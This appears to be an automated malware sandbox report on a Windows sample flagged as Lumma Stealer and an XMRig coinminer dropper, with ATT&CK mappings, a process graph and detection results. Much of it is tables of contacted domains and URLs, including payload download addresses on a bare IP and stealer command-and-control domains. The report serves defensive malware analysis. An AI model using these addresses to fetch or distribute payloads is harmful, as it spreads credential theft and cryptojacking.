                  Source: Yara matchFile source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B90 AddClipboardFormatListener,VirtualProtect,FreeConsole,0_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00064B90 AddClipboardFormatListener,3_2_00064B90

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts31
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Access Token Manipulation                  		21
                  Deobfuscate/Decode Files or Information                  		11
                  Input Capture                  		14
                  File and Directory Discovery                  		Remote Desktop Protocol41
                  Data from Local System                  		34
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Windows Service                  		4
                  Obfuscated Files or Information                  		Security Account Manager47
                  System Information Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		411
                  Process Injection                  		2
                  Software Packing                  		NTDS371
                  Security Software Discovery                  		Distributed Component Object Model11
                  Input Capture                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell                  		Network Logon Script1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		LSA Secrets1
                  Process Discovery                  		SSH2
                  Clipboard Data                  		125
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials141
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553050 Sample: PqSIlYOaIF.exe Startdate: 10/11/2024 Architecture: WINDOWS Score: 100 90 pastebin.com 2->90 92 pragapin.sbs 2->92 94 joxi.net 2->94 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Malicious sample detected (through community Yara rule) 2->114 118 16 other signatures 2->118 14 PqSIlYOaIF.exe 1 2->14         started        signatures3 116 Connects to a pastebin service (likely for C&C) 90->116 process4 signatures5 138 Contains functionality to inject code into remote processes 14->138 140 Injects a PE file into a foreign processes 14->140 142 LummaC encrypted strings found 14->142 17 PqSIlYOaIF.exe 1 14->17         started        22 WerFault.exe 19 16 14->22         started        24 conhost.exe 14->24         started        process6 dnsIp7 86 pragapin.sbs 104.21.39.3, 443, 49744, 49751 CLOUDFLARENETUS United States 17->86 88 147.45.47.81, 49833, 49933, 49934 FREE-NET-ASFREEnetEU Russian Federation 17->88 70 C:\Users\user\...\LOK6C9E3IK9GW8BSQQ492.exe, PE32 17->70 dropped 120 Query firmware table information (likely to detect VMs) 17->120 122 Found many strings related to Crypto-Wallets (likely being stolen) 17->122 124 Tries to harvest and steal ftp login credentials 17->124 126 2 other signatures 17->126 26 LOK6C9E3IK9GW8BSQQ492.exe 8 17->26         started        72 C:\ProgramData\Microsoft\...\Report.wer, Unicode 22->72 dropped file8 signatures9 process10 file11 76 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 26->76 dropped 78 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 26->78 dropped 130 Antivirus detection for dropped file 26->130 132 Multi AV Scanner detection for dropped file 26->132 134 Contains functionality to register a low level keyboard hook 26->134 30 cmd.exe 2 26->30         started        signatures12 process13 process14 32 Installer.exe 30->32         started        36 7z.exe 2 30->36         started        39 7z.exe 3 30->39         started        41 13 other processes 30->41 dnsIp15 84 joxi.net 78.47.21.153, 49907, 80 HETZNER-ASDE Germany 32->84 102 Writes to foreign memory regions 32->102 104 Allocates memory in foreign processes 32->104 106 Injects a PE file into a foreign processes 32->106 108 Contains functionality to detect sleep reduction / modifications 32->108 43 RegSvcs.exe 32->43         started        74 C:\Users\user\AppData\Local\...\Installer.exe, PE32 36->74 dropped file16 signatures17 process18 dnsIp19 96 pastebin.com 172.67.19.24, 443, 49927 CLOUDFLARENETUS United States 43->96 80 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 43->80 dropped 82 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 43->82 dropped 136 Sample is not signed and drops a device driver 43->136 48 cmd.exe 43->48         started        51 cmd.exe 43->51         started        53 cmd.exe 43->53         started        file20 signatures21 process22 signatures23 98 Encrypted powershell cmdline option found 48->98 100 Uses schtasks.exe or at.exe to add and modify task schedules 48->100 55 powershell.exe 48->55         started        58 conhost.exe 48->58         started        60 conhost.exe 51->60         started        62 schtasks.exe 51->62         started        64 conhost.exe 53->64         started        66 schtasks.exe 53->66         started        process24 signatures25 128 Loading BitLocker PowerShell Module 55->128 68 WmiPrvSE.exe 55->68         started        process26

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PqSIlYOaIF.exe61%ReversingLabsWin32.Trojan.Sodinokibi
                  PqSIlYOaIF.exe30%VirustotalBrowse
                  PqSIlYOaIF.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%AviraTR/Dldr.Agent.vfpsy
                  C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe100%AviraTR/Redcap.bgduw
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%Joe Sandbox ML
                  C:\ProgramData\Dllhost\WinRing0x64.sys5%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe79%ReversingLabsWin32.Coinminer.XMRig
                  C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe92%ReversingLabsWin32.Trojan.LummaStealer

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe0%Avira URL Cloudsafe
                  https://pragapin.sbs/=0%Avira URL Cloudsafe
                  http://147.45.47.81/0%Avira URL Cloudsafe
                  http://147.45.47.81/WinRing0x64.sysP0%Avira URL Cloudsafe
                  http://147.45.47.81/conhost.exe100%Avira URL Cloudmalware
                  http://147.45.47.81/WatchDog.exe100%Avira URL Cloudmalware
                  pragapin.sbs0%Avira URL Cloudsafe
                  http://147.45.47.810%Avira URL Cloudsafe
                  https://pragapin.sbs/SCvh0%Avira URL Cloudsafe
                  https://pragapin.sbs/apiA0%Avira URL Cloudsafe
                  https://pragapin.sbs/apit~0%Avira URL Cloudsafe
                  http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exe2%VirustotalBrowse
                  http://147.45.47.81/WinRing0x64.sys100%Avira URL Cloudmalware
                  http://147.45.47.81/conhost.exep0%Avira URL Cloudsafe
                  https://pragapin.sbs/W0%Avira URL Cloudsafe
                  https://pragapin.sbs/api0%Avira URL Cloudsafe
                  https://pragapin.sbs/N0%Avira URL Cloudsafe
                  https://pragapin.sbs/R0%Avira URL Cloudsafe
                  https://pragapin.sbs/apifEn0%Avira URL Cloudsafe
                  http://147.45.47.81/WatchDog.exeP0%Avira URL Cloudsafe
                  https://pragapin.sbs/p0%Avira URL Cloudsafe
                  http://147.45.47.81/lolMiner.exe100%Avira URL Cloudmalware
                  https://pragapin.sbs/rJ0%Avira URL Cloudsafe
                  http://147.45.47.81/xmrig.exeP0%Avira URL Cloudsafe
                  http://147.45.47.81/xmrig.exe100%Avira URL Cloudmalware
                  http://147.45.47.81D0%Avira URL Cloudsafe
                  http://147.45.47.81/WinRing0x64.sysChttps://pastebin.com/raw/dq3hWX270%Avira URL Cloudsafe
                  http://usbtor.ru/viewtopic.php?t=798)Z0%Avira URL Cloudsafe
                  http://147.45.47.81/conhost.exe.100%Avira URL Cloudmalware
                  https://pragapin.sbs/apin0%Avira URL Cloudsafe
                  https://pragapin.sbs/aZCA10%Avira URL Cloudsafe
                  https://pragapin.sbs/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  joxi.net
                  		78.47.21.153
                  		truefalse
                    		high
                    pragapin.sbs
                    		104.21.39.3
                    		truetrue
                      		unknown
                      pastebin.com
                      		172.67.19.24
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        repostebhu.sbsfalse
                          		high
                          http://joxi.net/4Ak49WQH0GE3Nr.mp3false
                            		high
                            pragapin.sbstrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://147.45.47.81/WinRing0x64.sysfalse
                            • Avira URL Cloud: malware
                            		unknown
                            brownieyuz.sbsfalse
                              		high
                              https://pragapin.sbs/apitrue
                              • Avira URL Cloud: safe
                              		unknown
                              tamedgeesy.sbsfalse
                                		high
                                rottieud.sbsfalse
                                  		high
                                  https://pastebin.com/raw/dq3hWX27false
                                    		high
                                    thinkyyokej.sbsfalse
                                      		high
                                      ducksringjk.sbsfalse
                                        		high
                                        http://147.45.47.81/xmrig.exefalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        relalingj.sbsfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/RegSvcs.exe, 0000001C.00000002.1722768807.000000000310C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabPqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exeInstaller.exe, 0000001A.00000002.1666398916.00000000004FC000.00000004.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000003.1666103048.0000000003482000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1720402344.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                                              • 2%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#Installer.exe.24.drfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                    		high
                                                    http://ocsp.sectigo.com0PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.24.dr, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                      		high
                                                      http://147.45.47.81/PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://contoso.com/Licensepowershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://joxi.net/4Ak49WQH0GE3Nr.mp3/Installer.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://pragapin.sbs/=PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://147.45.47.81/WinRing0x64.sysPRegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://147.45.47.81/conhost.exePqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595737127.0000000003068000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://147.45.47.81/WatchDog.exeRegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://147.45.47.81RegSvcs.exe, 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://pragapin.sbs/SCvhPqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                                		high
                                                                https://pragapin.sbs/apiAPqSIlYOaIF.exe, 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://aka.ms/pscore6lBpowershell.exe, 0000001F.00000002.1694523421.0000000004A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://pragapin.sbs/apit~PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://x1.c.lencr.org/0PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://147.45.47.81/conhost.exepPqSIlYOaIF.exe, 00000003.00000002.1595473812.0000000002FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://contoso.com/powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaPqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://pragapin.sbs/WPqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0tInstaller.exe.24.drfalse
                                                                                		high
                                                                                http://joxi.net/4Ak49WQH0GE3Nr.mp3UInstaller.exe, 0000001A.00000002.1666986072.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/products/firefoxgro.allPqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000001C.00000002.1722768807.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1694523421.0000000004A11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://pragapin.sbs/NPqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                                                        		high
                                                                                        https://pragapin.sbs/RPqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://pragapin.sbs/apifEnPqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPrInstaller.exe, 0000001A.00000000.1648420574.00000000004F4000.00000002.00000001.01000000.00000009.sdmp, Installer.exe, 0000001A.00000002.1666374640.00000000004F4000.00000002.00000001.01000000.00000009.sdmp, Installer.exe.24.drfalse
                                                                                          		high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://sectigo.com/CPS0PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.24.dr, LOK6C9E3IK9GW8BSQQ492.exe.3.drfalse
                                                                                              		high
                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoPqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://147.45.47.81/WatchDog.exePRegSvcs.exe, 0000001C.00000002.1722768807.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                              		high
                                                                                                              http://pastebin.comdRegSvcs.exe, 0000001C.00000002.1722768807.00000000030EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ocsp.rootca1.amazontrust.com0:PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://pragapin.sbs/pPqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brPqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://147.45.47.81/lolMiner.exeRegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
